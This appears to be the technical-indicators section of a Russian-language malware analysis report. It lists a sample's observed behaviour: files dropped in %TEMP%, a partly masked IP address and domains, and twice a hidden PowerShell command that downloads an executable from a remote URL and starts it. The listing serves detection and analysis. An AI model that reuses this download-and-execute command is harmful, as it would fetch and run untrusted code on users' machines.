Техническая информация
- $poyt как %temp%\kjhgf.exe
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""function skdhs([string] $poyt){(new-object system.net.webclient).downloadfile($poyt,''%tmp%\kjhgf.exe'');start-process ''%tmp%\kjhgf.exe'';}try{skdhs(''http://noble...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1700
- %TEMP%\zioouyt.bat
- %TEMP%\646109.cvr
- '34.##9.100.209':443
- DNS ASK no###s-iq.com
- DNS ASK bb##es.com
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\zioouyt.bat" " (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""function skdhs([string] $poyt){(new-object system.net.webclient).downloadfile($poyt,''%tmp%\kjhgf.exe'');start-process ''%tmp%\kjhgf.exe'';}try{skdhs(''http://noble... (со скрытым окном)